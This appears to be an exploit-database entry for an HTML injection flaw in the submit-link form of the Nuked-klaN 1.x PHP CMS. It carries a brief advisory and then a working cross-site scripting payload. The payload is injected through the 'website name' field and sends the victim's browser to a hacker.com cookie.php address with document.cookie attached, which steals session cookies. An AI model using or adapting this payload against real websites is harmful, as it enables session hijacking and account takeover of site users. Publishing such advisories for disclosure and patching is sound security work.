[] NeoSense
E X P L O I T S
title author type platform port cve id

Nuked-klaN 1.x - Submit Link Function HTML Injection

Author: XioNoX
type: webapps
platform: php
port: 
date_added: 2004-11-23 
date_updated: 2013-03-14 
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 
source: https://www.securityfocus.com/bid/11733/info

NuKed-Klan 'submit URI link' function is reported prone to a HTML injection vulnerability. It is reported that the issue exists due to a lack of sufficient input validation performed on the 'website name' input field of the NuKed-Klan submit URI link form.

Attackers may potentially exploit this issue to manipulate web content or to steal cookie-based authentication credentials. It may also be possible to take arbitrary actions as the victim user.

http://www.example.com/index.php?file=Suggest&module=Links
[Name of website] [a lot of spaces]
\'/>\"/><script></script><script>document.location=\'http://www.hacker.com/cookie.php?cookie=\'
+window.document.cookie;</script>
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.